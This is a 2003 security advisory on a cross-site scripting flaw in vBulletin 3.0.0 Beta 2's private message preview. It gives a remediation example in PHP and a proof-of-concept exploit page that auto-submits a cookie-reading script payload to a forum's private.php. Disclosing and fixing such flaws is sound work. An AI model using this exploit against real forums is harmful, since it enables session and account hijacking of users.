Vbulletin XSS

18.05.2003

------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
14.05.2003
------------------------------------------------------
Allows any kind of XSS attack, including account and session hijacking.

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Patched. This version of vBulletin has not been released publicly yet, but some vBulletin customers, such as www.sitepointforums.com (more than 23.000 members), are already using it.

------------------------------------------------------
Solution;
------------------------------------------------------
HTML-encode the output on the private message preview page, as the post thread preview page already does.
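
The fix above, sketched as an added example (not vBulletin source and not part of the original advisory). It assumes the preview page echoes the submitted title back into the form's value="" attribute; the function names and the input markup are hypothetical.

```php
<?php
// Added illustration: hypothetical helpers, not vBulletin code.

// Vulnerable pattern: the submitted title is written into the preview
// form's value="" attribute without any encoding.
function render_title_unsafe(string $title): string
{
    return '<input type="text" class="bginput" name="title" value="' . $title . '" />';
}

// Fixed pattern: encode for an HTML attribute context. ENT_QUOTES encodes
// both quote styles, so the value cannot close the attribute or the tag.
function render_title_safe(string $title, string $charset = 'UTF-8'): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, $charset);
    return '<input type="text" class="bginput" name="title" value="' . $encoded . '" />';
}

// Regression check: parse the rendered field and confirm that exactly one
// input exists, no script element was created, and the value round-trips.
function field_is_intact(string $html, string $expected): bool
{
    $previous = libxml_use_internal_errors(true); // silence parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $inputs = $doc->getElementsByTagName('input');
    return $inputs->length === 1
        && $doc->getElementsByTagName('script')->length === 0
        && $inputs->item(0)->getAttribute('value') === $expected;
}

// Title value from the advisory's proof of concept, with [] read as <>.
$title = '"><script>alert(document.cookie)</script>';

foreach (['unsafe' => 'render_title_unsafe', 'safe' => 'render_title_safe'] as $label => $fn) {
    $html = $fn($title);
    printf("%-6s intact=%s\n       %s\n", $label, field_is_intact($html, $title) ? 'yes' : 'no', $html);
}
```

The same check can run in a test suite against every template that re-displays user input in a preview, so that a new preview page cannot ship without the encoding the thread preview already has.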

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[html]
[body]
[form action="http://[victim]/forum/private.php" method="post"
name="vbform"]
[input type="hidden" name="do" value="insertpm" /]
[input type="hidden" name="pmid" value="" /]
[input type="hidden" name="forward" value="" /]
[input type="hidden" name="receipt" value="0" /]

[input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" /]
[textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"][/textarea]
[input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" /]
[input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" ]

[input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" /]
[input type="checkbox" name="signature" value="1" id="cb_signature" /]
[input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" /]
[input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" /]
[/form]
[script]
//Set Values and Submit
// You can write your own JS codes
var xss = "\"][script]alert(document.cookie)[\/script]";
document.vbform.title.value=xss;
document.vbform.preview.click();
[/script]
[/body]
[/html]

* Replace [ ] with < >
** You may need to log in first
Ferruh Mavituna
© 2002-2007, Ferruh Mavituna
